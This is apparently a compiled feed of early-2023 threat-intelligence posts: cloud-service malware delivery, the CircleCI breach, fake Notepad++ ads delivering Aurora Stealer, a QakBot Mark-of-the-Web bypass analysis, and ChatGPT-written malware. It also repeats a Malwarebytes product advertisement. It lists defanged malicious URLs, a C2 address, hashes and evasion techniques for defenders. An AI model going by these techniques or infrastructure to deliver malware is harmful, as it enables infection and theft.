3da407c1a30d810aaff9a04dfc1ef5861062ebdf0e6d0f6823ca682ca08c37da

SHA256Basic BOLDMOVE3191cb2e06e9a30792309813793f78b6MD5Extended BOLDMOVE

0184e3d3dd8f4778d192d07e2caf44211141a570d45bb47a87894c68ebebeabb

SHA256Extended BOLDMOVE54bbea35b095ddfe9740df97b693627bMD5Windows version of BOLDMOVE61aae0e18c41ec4f610676680d26f6c6e1d4d5aa4e5092e40915fe806b679cd4SHA256Windows version of BOLDMOVE

Our most recent Cloud and Threat Report highlighted how threat actors abuse cloud services (with a special focus on cloud storage apps) to deliver malicious content (and yes, OneDrive leads the chart of the most exploited apps).

To confirm that this trend will likely continue in 2023, researchers at Trend Micro have discovered an active campaign, launched by a threat actor named Earth Bogle. They are using Middle Eastern geopolitical themes as a lure to target potential victims in the Middle East and Africa, and exploiting multiple public cloud storage services in a two-staged campaign aimed to distribute the remote access tool NjRAT (AKA Bladabindi).

During 2022, we have discovered 401 different apps exploited to deliver malware, and even this fragmentation trend will likely continue in 2023, given that for this specific campaign the threat actors have weaponized multiple cloud services. This not only includes the usual suspects, such as OneDrive and Discord exploited, and  legitimate compromised websites, to distribute the stage two dropper, but also a couple of less known cloud storage services, files.fm and failiem.lv, used to deliver the stage one payload hidden inside a Microsoft Cabinet (CAB) archive file masquerading as a “sensitive” audio file (once again the attackers prey on the curiosity of their victims).

An additional interesting aspect of this campaign is that the links to the malicious cloud storage apps have been advertised through fake social media accounts claiming to belong to reputable organizations. This is an additional indirect contribution of weaponized cloud services for this campaign, as we have also demonstrated in our Cloud and Threat report, where social media were among the top referrers for distributing malicious links.

As the Trend MIcro researchers point out, this case demonstrates that threat actors will leverage public cloud storage as malware file servers, combined with social engineering techniques appealing to people’s sentiments such as regional geopolitical themes as lures, to infect targeted populations.

How Netskope mitigates the risk of legitimate cloud services exploited to deliver malware

For all the cloud services involved in this campaign, the Netskope Next Gen SWG provides granular access control. It is possible to govern up to 35 activities for the “Cloud Storage” category, where OneDrive, files.fm, and failiem.lv belong, and up to seven activities for the “Chat, IM, & other communication” where Discord belongs. Moreover OneDrive is one of the  dozens of apps for which instance detection is also available. To defend against attacks where a legitimate cloud service is exploited to distribute malware, it is possible to configure a policy that prevents potentially dangerous activities (such as download) from non-corporate instances, or in general from any unneeded cloud storage or instant messaging service for the enterprise.

Netskope customers are also protected against malware distributed from a legitimate cloud service by Netskope Threat Protection. Netskope Threat Protection scans web and cloud traffic to detect known and unknown threats with a comprehensive set of engines including signature-based AV, machine learning-based detectors for executables and Office documents, and sandboxing. Part of the advanced capabilities of Netskope Threat Protection is also the Patient Zero protection, which prevents the delivery of unknown or zero-day threats (at the time of discovery the malicious payloads of this campaign had a very low detection rate) until a verdict by the advanced engines is available. And obviously Netskope threat intelligence blocks the access to malicious sites, wherever they are hosted, whether it is a malicious domain or a weaponized cloud app, and regardless of the origin of the link, such as a social media account.

Netskope Cloud Exchange, included in any license, is a precious ally of Netskope customers, providing a powerful tool to leverage the existing security investments through the integration between the Netskope platform and third-party technologies such as threat intelligence feeds, endpoint detection solutions,, trouble ticketing system, and SIEM/SOAR platforms.

Finally, Netskope Advanced Analytics provides specific dashboards to assess the risk of rogue cloud instances being exploited to deliver malware or becoming the target of anomalous communications, with rich details and insights, supporting security teams in the analysis and mitigation/remediation process.

You can subscribe to the Cloud Threats Memo mailing list at this link.

The post Cloud Threats Memo: Threat Actors Continue to Abuse Cloud Services to Deliver Malware in 2023 appeared first on Netskope.

Top-Malware-Trends-of-December-Cofense-P

The Cofense Phishing Defense Center (PDC) employs expert Threat Analysts to analyze emails on behalf of enterprise customers across the globe, in various industries, who are dealing daily with phishing attacks delivering malware. To help keep up with evolving tactics and top ongoing threats affecting real customers, the PDC has created a breakdown of the […]

The post Top Malware Trends of December: Cofense Phishing Defense Center (PDC) appeared first on Cofense.

asset_upload_file41951_255560.jpg

Software development service company CircleCI has published its incident report on a breach that happened in December.

CircleCI revealed an engineer’s laptop was successfully infected with a yet-to-be-named information-stealing Trojan, which was used to steal an engineer’s session cookie. The company didn’t provide information on how the malware got onto the laptop.

From the report:

“This machine was compromised on December 16, 2022. The malware was not detected by our antivirus software. Our investigation indicates that the malware was able to execute session cookie theft, enabling them to impersonate the targeted employee in a remote location and then escalate access to a subset of our production systems.”

In this case, the session cookie was an authentication token, described in the report as a “2FA-backed SSO session” cookie. This is a kind of authentication cookie that is stored by a web browser after you successfully log in to a website. When the browser interacts with restricted content, it uses the cookie to prove that you have logged in, so you don’t need to reenter your password over and over again.

Stealing a user’s authentication cookie gives an attacker exactly the same access as they’d get if they stole the user’s password and logged in. In this case, the account wasn’t just protected by a password, it was also protected by some form of two-factor authentication (2FA). By stealing an authentication cookie, the attacker was able to perform an end run around the 2FA (and any other forms of authentication) protecting the acount.

Thankfully, stealing authentication cookies isn’t easy, and in this case the attacker was only able to do it by installing malware on on an engineer’s laptop, from where they could probably have stolen the victim’s passwords and 2FA tokens eventually anyway.

A customer alerted the company to “suspicious GitHub OAuth activity” on December 29, 2022, leading to the conclusion that this customer’s OAuth token had been compromised. As a result, CircleCI says it proactively began rotating all customer-associated tokens on their behalf. These include Project API, Personal API, and GitHub OAuth tokens.

CircleCI made an official announcement of its security breach on January 4 of this year, urging all its clients to rotate “any and all” their secrets—passwords or private keys—stored in CircleCI and review logs for unauthorized access occurring between December 21, 2022, and January 4, 2023.

Because the victim employee is an engineer who routinely generates access tokens, the attacker “access[ed] and exfiltrate[d] data from a subset of databases and stores, including customer environment variables, tokens, and keys. The company also has reason to believe that reconnaissance activity took place first on December 19 before an exfiltration activity was spotted on December 22, just days after.

“Though all the data exfiltrated was encrypted at rest, the third party extracted encryption keys from a running process, enabling them to potentially access the encrypted data,” the report further says.

Since then, CircleCI says it has been improving its infrastructure by adding behavior detection to its antivirus and mobile device management (MDM) system. It’s also restricted access to its production environments and increased the security of its 2FA implementation.

This recent cybersecurity incident with CircleCI isn’t a first. In 2019, the company was breached following a supply chain attack against its analytics vendor. Its account with the vendor was compromised, giving attackers access to some user data, which includes usernames and email addresses associated with GitHub and Bitbucket.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Introduction

Google ads are a common vector for malware distribution.  Do a Google search for any popular free software download.  Review any search results marked “Ad” or “Sponsored,” then check the link to see if anything is unusual.

I’ve already written two diaries and authored various tweets about this type of activity:

https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376
https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344

2023-01-16 (Monday) – Google ad led to fake software site sending malware. Post-infection activity for #Gozi (#ISFB/#Ursnif) and #RedlineStealer. Seeing this for different software searches. Indicators for an infection from a fake 7-Zip page available at https://t.co/B8pGG8t3hB pic.twitter.com/kxHzsA0DxR

— Unit 42 (@Unit42_Intel) January 17, 2023

2022-12-29 (Thursday): Google ad leads to fake Adobe Reader page pushing malware. IOCs available at: https://t.co/eQTkfQUeVn pic.twitter.com/cqZMz1uulM

— Unit 42 (@Unit42_Intel) December 29, 2022

Others have also reported his activity.  Recent posts include:

https://www.bleepingcomputer.com/news/security/google-ad-for-gimporg-served-info-stealing-malware-via-lookalike-site/
https://heimdalsecurity.com/blog/google-ads-exploited-to-spread-malware/
https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

Google Ads Malware Wipes NFT Influencer’s Crypto Wallet

One example of free software routinely spoofed for Google ads is Notepad++.  Almost without fail, I can find a fake webpage for Notepad++ every day through Google ads.  For today’s diary, I found a Google ad for a malicious site at notopod-plos-plus[.]com.


Shown above:  Google ad for fake Notepad++ site.  Misspelled “Notepad” as “Notepade” in the ad.

These fake sites copy pages from the real software sites and have links to download the malware.


Shown above:  Downloading malware form the fake Notepad++ page.

The URL to download malware was notopod-plos-plus[.]com/bsdf/file.php which redirected to another URL hosting the malware.  I found the redirect by using a URL shortner revealer.  In this case, I used expandurl.net and found the malware hosted at hxxps://obsqroject[.]com/npp.8.4.8.Installer.x64.exe.  Note the “q” in “obsqroject” in the malware download URL.  The malware is ‘hosted on a server impersonating the legitimate site obsproject.com.


Shown above:  Using a tool that reveals locations of shortened URLs to find a redirect for our malware.

The downloaded malware was detected by Microsoft Defender as an unrecognized app, so I had some extra clicks to run it.


Shown above:  Windows Defender doesn’t like this type of downloaded EXE file.

Post-infection traffic caused by this malware went to a server at 79.137.133[.]225 over TCP port 8081.


Shown above:  Post-infection traffic shown in Wireshark.

Post-infection traffic consists of plain text.  Text sent by the server to the infected Windows host was WORK and Accept and Thanks. Data sent by the infected Windows host to the server looks like Base64 text.


Shown above:  Start of TCP stream for the post-infection traffic.


Shown above:  End of TCP stream for the post-infection traffic.

Note the server sent WORK once, Accept multiple times and Thanks twice.


Shown above:  Text sent from the server to the infected Windows host.

This post infection traffic follows patterns seen with previous examples of Aurora Stealer malware.

Indicators of Compromise

Google ad traffic to fake Notepad++ site:

hxxps://www.googleadservices[.]com/pagead/aclk?sa=L&ai=DChcSEwiNnNGbq9D8AhUOFdQBHYudC80YABAAGgJvYQ&ohost=www.google.com&cid=CAASJORocbWbOK8xihLbtr-uk4JIaGPISKgFmjK_urkXpVpd9puZOQ&sig=AOD64_3UiS622EDVVxZE1kULfyg7CYIZgA&q&adurl&ved=2ahUKEwik1sqbq9D8AhXJmGoFHamhBjM4MhDRDHoECAEQAQ
hxxps://notopod-plos-plus[.]com/?gclid=EAIaIQobChMIjZzRm6vQ_AIVDhXUAR2LnQvNEAMYASAAEgKemfD_BwE

Traffic to download the malware:

hxxps://notopod-plos-plus[.]com/bsdf/file.php
hxxps://obsqroject[.]com/npp.8.4.8.Installer.x64.exe

Aurora Stealer post-infection traffic:

tcp://79.137.133[.]225:8081

Downloaded Aurora Stealer malware sample available at:

https://bazaar.abuse.ch/sample/6c365c86aa823b55235be2d7f139160bfe994a33b2d34b73de239b24bbde7391

Sandbox analysis of the Aurora Stealer malware:

https://app.any.run/tasks/3998cf08-2e26-45da-8d37-f1e99aba0d3f
https://tria.ge/230118-f1ewcaac94

Final Words

Criminal groups frequently use Google ads to distribute malware.  These ads frequently lead to fake sites impersonating web pages for legitimate software.  In some cases, these malicious files install a copy of the legitimate software and include malware in the background.  In other cases like this one, the files just run or install malware.

In most cases, Microsoft Defender warns victims these files are potentially dangerous.  Unfortunately, many people click past these warnings and infect their computers.

How can we best prevent these infections?  My advice is to follow best security practices and avoid ads when searching for free software downloads on Google.

—-
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Batloader-Malware-Abuses-Legitimate-Tool

We discuss the Batloader malware campaigns we observed in the last quarter of 2022, including our analysis of Water Minyades-related events (This is the intrusion set we track behind the creation of Batloader).

cover-abusing-github-codespaces-malware-

Proof of Concept (POC): We investigate one of the GitHub Codespaces’ real-time code development and collaboration features that attackers can abuse for cloud-based trusted malware delivery. Once exploited, malicious actors can abuse legitimate GitHub accounts to create a malware file server.

ChatGPT-post-1059x529-1.jpg

Today’s AI can beat humans at Jeopardy, chess, recognizing faces and diagnosing medical conditions. As of last Fall it can write malware, too. In fact, it can write an entire attack chain: phishing emails, macros, reverse shells, you name it. What do we do now?

The post AI Can Write Malware Now. Are We Doomed? appeared first on Check Point Research.

Malicious links. Third-party ad trackers. Information-gobbling data brokers.

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there.

That’s where Malwarebytes Premium + Privacy VPN comes in.

Whether it’s blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

1. Let’s you browse anonymously

It’s no secret that some companies are big fans of your personal information.

Your name, your address, location data, and more, are all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

But one of the most valuable pieces of information is your browsing history, because it says a lot about what you like and where you spend your time. When it comes to getting a good look at your browsing your ISP has a window seat, and in the USA ISPs have been allowed to sell your browsing data since 2017.

The easiest and most effective ways to put a stop to that? Using a Virtual Private Network, or VPN.

VPNs create a secure, encrypted “tunnel” between your device and the VPN server, through which all of your internet traffic is routed—so if your ISP is collecting your data, it won’t be able to read it.

But not all VPNs are equal.

Some VPN providers log your data and browsing history, which means they’re just another ISP that can potentially share your data with third parties. Other VPNs can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you’re tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy.

We don’t log anything. Ever.
Best-in-class encryption secures your personal information.
Less lag. Browse the Internet faster with VPNs powered by WireGuard®.
Over 380 servers in more than 30 countries.
7-day free trial. All the premium features, no data limits!

2. Crushes ads, third-party trackers, and blocks malicious websites

We ignore the many threats to web browsers at our own peril.

Legitimate sites are following us with third-party tracking code, and criminal hackers are busy making friendly sites unfriendly by injecting credit card skimmers, and trying to steal our passwords with phishing sites. One way or another, wherever you go, your personal, sensitive data is being stolen or shared with somebody using it for financial gain.

And your browser? It lets this happen without complaint.

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right.

Chrome has the infamously useless ‘Do Not Track’ setting, and anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen, but they work with variable levels of success and aren’t enough by themselves.

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

You’re in charge. We prevent third-party ad trackers from collecting information about your browsing habits.
Shields up. We intercept (and block) malicious skimming scripts your browser can execute them.
Clear the clutter. Browse up to 4x faster by blocking ads and other unwanted content.
Uses heuristics to sniff out and block unknown phishing sites.
Available on your preferred browser—for free!

Malwarebytes Browser Guard blocking a credit card skimming attack

3. Uses multiple protection layers to actively stop threats

A key part of browsing securely online is accepting the risk that no one technology can keep out 100 percent of the threats 100 percent of the time.

To that end, it’s essential to use a strong anti-malware product that catches any threats that do slip through the cracks and make it to your desktop.

But that’s not all. To quote everybody’s favorite ogre, security has “layers” just like onions—your anti-malware should also have multi-layers of defense, not just one.

Because what’s better than one layer of protection? Two.

What’s better than two? Three.

Better than that?

(Okay, you get the point.)

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several.

Enter Malwarebytes Premium, offering four different layers of malware protection.

Advanced web protection. Blocks outgoing or incoming communication so malware can’t receive instructions or steal your data.
Malware & PUP protection. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.
Ransomware protection. Proprietary ransomware attack prevention technology.
Exploit protection. Blocks malware which seeks to leverage bugs and vulnerabilities in your device.

Go beyond just antivirus. Level-up your security and privacy today.

Choosing between security and privacy shouldn’t feel like a Herculean task.

While no single method is ever 100 percent foolproof, there are some tried and true ways for keeping your data (and device) safe that, if put into practice, will guard you from most of the threats and prying eyes on the Internet.

Downloading Malwarebytes is one of those ways.

With the Malwarebytes Premium + Privacy VPN bundle, you get total protection with smart antivirus, faster, safer web browsing, and our next-gen VPN for your online privacy. Level-up your protection and upgrade to the bundle today.

Stay safe out there!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Title: 3 ways Malwarebytes helps you browse securely and privately online

Malicious links. Third-party ad trackers. Information-gobbling data brokers. 

 

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there. 

 

That’s where Malwarebytes Premium + Privacy VPN comes in.

 

Whether it’s blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

Let’s you browse anonymously

It’s no secret that companies are big fans of your personal information. 

 

Whether it’s your name, your address, browsing history, location data, and so on—it’s all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

 

One of the easiest and most effective ways to put a stop to all this snooping? Using a Virtual Private Network, or VPN

 

VPNs create a secure, encrypted “tunnel” between your device and the VPN server, through which all of your internet traffic is routed—so even if companies are collecting your data, they won’t be able to read it. That means no more  location tracking and targeted ads.

 

But not all VPNs are equal. 

 

Some VPN providers may log your data and browsing history, which means they could potentially share your data with third parties. Others can slow down your Internet to a significant degree, using older encryption methods or having fewer options for servers located nearer to you.

 

Needless to say, choosing the wrong VPN vendor can feel like trading one poison for another. So if you’re tired of dealing with both data-hungry companies and lackluster VPNs, then look no further than Malwarebytes Privacy

 

We don’t log anything. Ever

Best-in-class encryption secures your personal information.

Less lag. Browse the Internet faster with VPNs powered by WireGuard®.

Over 380 servers in more than 30 countries.

7-day free trial. All the premium features, no data limits!

 

Crushes ads, third-party trackers, and blocks malicious websites

We ignore the many threats native to browsers at our own peril. 

 

Peel back the pretty UI, and you’ll find a delicate machinery of code that threat actors and third-parties can manipulate using browser scripts.

 

Think of it like putting a Trojan horse into the gears of a website. Anyone can sneak an ad tracker or credit card skimmer into the browser’s back-end, right under your nose. The result is the same either way—personal, sensitive data is stolen and used for financial gain. 

 

If you think your browser comes with native abilities to block tracking scripts and other threats like phishing websites, though, you’d be half right. 

 

Chrome has the infamously useless ‘Do Not Track’ setting—but that’s about it. Anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen—but with variable levels of success

 

It stands to reason then that Malwarebytes Browser Guard is the ultimate browsing sidekick for quashing ads, phishing sites, and trackers.

 

You’re in charge. We prevent third-party ad trackers from collecting information about your browsing habits.

Shields up. We intercept (and block) malicious skimming scripts your browser can execute them.

Clear the clutter. Browse up to 4x faster by blocking ads and other unwanted content.

Uses heuristics to sniff out and block unknown phishing sites.

Available on your preferred browser—for free!

szEBUCGEWgaE4Z-x6L0g55bDSfZ5tmws8mi1ImOh

Malwarebytes Browser Guard blocking a credit card skimming attack

 

Uses multiple protection layers to actively stop threats

A key part of browsing securely online is accepting the risk that no browser or browser extension can keep out 100% of the threats 100% of the time. 

 

To that end, it’s essential to use a strong anti-malware product that catches the threats that do slip through the cracks and make it to your desktop.

 

But that’s not al. To quote everybody’s favorite ogre, security has “layers” just like onions—your anti-malware should also have multi-layers of defense, not just one.

 

Because what’s better than one layer of protection? Two. 

 

What’s better than two? Three. 

 

Better than that? 

 

(Okay, you get the point.)

 

The fact is you don’t want to rely on any one mechanism to keep the wolves at bay, you want several. 

 

Enter Malwarebytes Premium, offering four different layers of malware protection.

 

Advanced web protection. Blocks outgoing or incoming communication between your computer and a malicious Internet Protocol (IP) address.

Halt hackers. Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats.

Intelligent defense. Proprietary ransomware attack prevention technology.

Exploit. Blocks malware which seeks to leverage bugs and vulnerabilities in your device.

Go beyond just antivirus. Level-up your security and privacy today.

Choosing between security and privacy shouldn’t feel like a Herculean task.

Check Point Research reports that Glupteba has returned to the top ten list for the first time since July 2022. Qbot overtook Emotet as the most prevalent malware in December, while android malware Hiddad made a comeback Our latest Global Threat Index for December 2022 saw Glupteba Malware, an ambitious blockchain-enabled Trojan botnet, return to…

The post December 2022’s Most Wanted Malware: Glupteba Entering Top Ten and Qbot in First Place appeared first on Check Point Software.

vulnerability-banner

Executive Summary

This paper investigates a recent QakBot phishing campaign’s ability to evade Mark-of-the-Web (MoTW) security features, allowing for escape from the designated security zone and  successful installation of malicious software on victim device.. Key observations:

EclecticIQ analysts investigated QakBot phishing campaigns switching to a Zero-Day Vulnerability to evade Windows Mark of the Web (MoTW). QakBot may be able to increase its infection success rate as a result of the switch to a zero-day exploit.

The threat actor distributes QakBot using phishing emails with a malicious URL inside.

When a victim user clicks on the malicious URL, it starts to download an encrypted ZIP folder that contains an ISO image. If the ISO image is opened by victim, it will mount itself on a disk and open another File Explorer window that contains the final QakBot Loader as a JavaScript format which can be executed by a simple user click.

The final QakBot Loader (WW.js) contains a malformed digital signature to evade the Mark of the Web (MoTW) Security feature on Windows OS. · EclecticIQ analysts observed use of zero-day vulnerabilities is increasing among non-nation state cyber criminals.

Living off the Land Binaries (LOLBINS) like Regsvr32.exe (2) and WScript.exe (3) are actively abused to execute QakBot Malware.

What is Mark of The Web (MoTW)?

Mark of the Web (MoTW) is used by Windows as a security feature across its product suite. This feature works by checking downloaded executable files against a file whitelist that are downloaded by Windows users.If the file is not on that list, Windows Defender SmartScreen will show a warning message like image below and it will not execute the malware:

 qakbot-1

Figure 1 – Windows SmartScreen warning

The MS Office Protected view feature is used to protect MS Office users against potential malware in documents. Most of the MS Office file types flagged with MOTW will be opened with PROTECTED VIEW:

qakbot-2

Figure 2 -MS Office document opened as Protected View

MS Office is able to block macro enabled office document downloaded from the internet, if the appropriate setting is enabled. Macros in MS Office files flagged with MOTW are disabled and a warning message is displayed to the user:

qakbot-3

Figure 3 – Macros blocked on downloaded Excel document

When a Windows OS user downloads a file from the internet, it creates an Alternative Data Stream (ADS) named Zone.Identifier and adds a ZoneId to this ADS in order to indicate the zone from which the file originates. This is a proactive security feature to prevent downloading malicious files on untrusted source. Many Windows security features such as Microsoft Office Protected view, SmartScreen, Smart App Control, and warning dialogs rely on the presence of the MoTW to function correctly.

As the example image shows, details of MoTW alternate data streams on downloaded file from VirusTotal.ZoneID being used to identify a file, for example The following ZoneId values may be used in a Zone.Identifier ADS:

Local computer
Local intranet
Trusted sites
Internet
Restricted sites

qakbot-final-4

Figure 4 – Extracting ZoneID ADS on downloaded file

QakBot Campaign Observed Evading Windows Mark of the Web (MoTW)

At the beginning of November 2022, EclecticIQ analysts examined a recent campaign that delivers QakBot (also called Qbot) to victim devices via phishing emails, executes by abusing multiple Living Off the Land Binaries (LOLBAS) and evades the Mark of the Web (MoTW) flag to increase the infection rate. Qakbot has been observed as an initial access point for ransomware groups (4).

Threat actors have used QakBot since 2007 (5) as a Banking Trojan to steal credit card information from victim devices. It evolved as initial access malware for remotely delivering additional malicious payloads. Black Basta Ransomware gang used QakBot to create an initial access point of victim’s device and move laterally within an organization’s network to execute ransomware at the end of the kill chain.

QakBot’s execution process is highlighted below:

qakbot-6

Figure 5 – QakBot Execution Flow

First Stage: Phishing Emails Containing Malicious URLs Deliver Qakbot Loader

The attack starts with a phishing email containing a malicious URL and ZIP password for delivering the QakBot malware. Victims clicking on the URL download an encrypted ZIP folder which can be unzipped with a password provided by attackers via phishing email. That unzipped file contains a randomly named malicious ISO image. The ISO image contains a final QakBot loader in form of a JavaScript file (WW.js) which is used to execute QakBot DLL in-memory of wermgr.exe (a Windows error reporting process).

qakbot-7Figure 6 – Example of Phishing Email delivers QakBot Malware

Second Stage 2.1: In-Memory Execution of QakBot Malware via JavaScript Loader

The QakBot Loader can be executed by one of the most widely abused Living Off the Land Binaries And Scripts (LOLBAS) called wscript.exe (3). Threat Actors often abuse Windows built in features to avoid detection. On Windows OS, JavaScript file extension can be executed by user click, upon the execution it uses Windows built in software called wscript.exe (3).

qakbot-7Figure 7 – QakBot loader inside mounted ISO image.

QakBot Loader deploys the Regsvr32.exe (2) command line tool as an obfuscated string to evade antivirus detections. When a user clicks on the WW.js, it will use Regsvr32.exe (2) to load the QakBot DLL, which is located under the port directory and is named resemblance.tmp.

qakbot-9Figure 8 – QakBot Loader with malformed digital signature.

qakbot-10Figure 9 – Resemblance.tmp contains MZ magic header which marking it executable.

qakbot-11Figure 10 – Extracted malformed digital signature from JavaScript QakBot Loader

Second Stage 2.2: QakBot Loader uses Malformed Digital Signature to Evade Mark of the Web (MoTW)

On November 3rd, researcher Will Dormann (6) identified three different MoTW bypass methods for bypassing the MoTW feature. On November, 8th, Microsoft released patches (CVE-2022-41049, CVE-2022-41091) (7) addressing two of the methods. The 3rd method – using malformed digital signatures (CVE-2022-44698) (8) – patched on December 13 and is actively exploited in the wild.

Normally, after executing the QakBot loader, Windows will display a warning message (see Figure 11) to avoid the execution. Because of the malformed digital signature, the loader bypasses the Mark of the Web (MoTW) flag, and the execution is proceeds without a Windows warning pop-up message.

qakbot-final-12Figure 11 – Mark of the Web (MoTW) in action

qakbot-final-11Figure 12 – Downloaded JavaScript file from untrusted URL automatically flagged by MoTW.

Third Stage: QakBot Uses Multiple Techniques to Evade Anti-Malware Scanners

In the next stage of the attack, QakBot injects itself inside the legitimate Windows Error Reporting process (wermgr.exe) to evade behavior based anti-malware solutions.

qakbot-14Figure 13 – Injected QakBot DLL

More information about the Living Off the Land Binaries Regsvr32.exe and WScript.exe can be found via the links below.

Regsvr32.exe (2)
WScript.exe (3)

qakbot-15

Figure 14 – Process injection on wermgr.exe and LOLBAS observed in process tree.

QakBot uses Windows API Hashing (Dynamic API Resolution) to evade signature-based anti-malware scanners. It hides the content of the import address table by XOR Encrypted API Hashing Algorithm called CRC32.

Below pictures showing Decompiled functions being used to perform API Hashing:

qakbot-16Figure 15 – XOR Encrypted API Hashing.

EclecticIQ analysts extracted the XOR key which is used to decrypt the content of APIs during the execution time and used this key to decrypt other APIs for further analysis.

qakbot-17Figure 16 – XOR Encryption key stored as static to decrypt the API hash.

QakBot also uses the XOR encryption algorithm to hide its strings for minimizing AV detection. Figure 10 shows encrypted strings are stored in the .rdata Section. They are decrypted during run time.

qakbot-18Figure 17 – XOR Encrypted strings hidden inside rdata section

EclecticIQ analysts successfully decrypted the XOR encrypted strings used by QakBot. The decrypted strings are used by QakBot for testing the internet connection of the victim device, conducting a sandbox check, gaining persistence on the victim device by abusing Schedule Task, and gathering victim computer information upon the attacker’s request through a command-and-control (C2) server.

qakbot-19Figure 18 – Decrypted Strings from QakBot Malware

Fourth Stage: Command and Control (C2) Connection

After successful execution, QakBot checks its internet connectivity and will send multiple POST requests to its C2 servers.

QakBot checks internet availability on victim’s device:

qakbot-20Figure 19 – QakBot malware checking Internet availability

C2 protocol uses JSON object encapsulation with a RC4 Encrypted message which is encoded with Base64.

qakbot-21Figure 20 – QakBot performs command and control connections

Raw example of an HTTP POST request sent by QakBot to its C2:

image-png-4.png

 

 

MITRE ATT&CK

Technique Name
TTP ID

User Execution: Malicious Link

T1204.001

System Binary Proxy Execution: Regsvr32 
T1218.010

Command and Scripting Interpreter: JavaScript 
T1059.007

Phishing: Spearphishing Link 
T1566.002

Application Layer Protocol: Web Protocols 
T1071.001

Process Injection: Process Hollowing
T1055.012 

Obfuscated Files or Information 
T1027

Obfuscated Files or Information: Dynamic API Resolution
T1027.007

System Information Discovery 
T1082

Scheduled Task/Job: Scheduled Task 
T1053.005

Virtualization/Sandbox Evasion: System Checks 
T1497.001

Windows Management Instrumentation 
T1047

Indicators:

FIle Name
SHA 256 Hash

resemblance.tmp
8ca16991684f7384c12b6622b8d1bcd23bc27f186f499c2059770ddd3031f274

UY76.img
26f5bc698dfec8e771b781dc19941e2d657eb87fe8669e1f75d9e5a1bb4db1db

WW.js
c5df8f8328103380943d8ead5345ca9fe8a9d495634db53cf9ea3266e353a3b1

Injected-QakBot-dll
6fb41b33304b65e6e35f04e8cc70f7a24cd36e29bbb97266de68afcf113f9a5f

 

Find the data for COMMAND AND CONTROL SERVER C2 

Find the data for YARA RULES

About EclecticIQ Intelligence & Research Team

EclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence & Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com or fill in the EclecticIQ Audience Interest Survey to drive our research towards your priority area.

Structured Data

Find the Analyst Prompt and earlier editions in our public TAXII collection for easy use in your security stack.

TAXII v1 Discovery services: https://cti.eclecticiq.com/taxii/discovery

Please refer to our support page for guidance on how to access the feeds.

You might also be interested in:

Network Environment-Focused Conversations Needed in Approaches to Cyber Security

Emotet Downloader Document Uses Regsvr32 for Execution

AI Facial Recognition Used in Ukraine/Russia War Prone to Vulnerabilities

Appendix

Magniber Ransomware Attempts to Bypass MOTW (Mark of the Web)


https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/ 
https://lolbas-project.github.io/lolbas/Binaries/Wscript/
https://www.darkreading.com/threat-intelligence/black-basta-gang-deploys-qakbot-malware-cyber-campaign 
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot 

So to summarize, we've got 3 different MotW bypasses:
1) "Special" ZIP contents – Works on all versions of Windows
2) Corrupt Authenticode – Works on all Windows versions prior to Win11 22H2
3) Just open from ZIP directly – Works on Win11 22H2
Take your pick. Or hedge your bets!

— Will Dormann (@wdormann) November 3, 2022


https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41091 
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44698 
https://www.bleepingcomputer.com/news/security/new-attacks-use-windows-security-bypass-zero-day-to-drop-malware/ 
https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/

I don’t know how much of a thing this will end up being, but we are seeing ChatGPT-written malware in the wild.

…within a few weeks of ChatGPT going live, participants in cybercrime forums—­some with little or no coding experience­—were using it to write software and emails that could be used for espionage, ransomware, malicious spam, and other malicious tasks.

“It’s still too early to decide whether or not ChatGPT capabilities will become the new favorite tool for participants in the Dark Web,” company researchers wrote. “However, the cybercriminal community has already shown significant interest and are jumping into this latest trend to generate malicious code.”

Last month, one forum participant posted what they claimed was the first script they had written and credited the AI chatbot with providing a “nice [helping] hand to finish the script with a nice scope.”

The Python code combined various cryptographic functions, including code signing, encryption, and decryption. One part of the script generated a key using elliptic curve cryptography and the curve ed25519 for signing files. Another part used a hard-coded password to encrypt system files using the Blowfish and Twofish algorithms. A third used RSA keys and digital signatures, message signing, and the blake2 hash function to compare various files.

Check Point Research report.

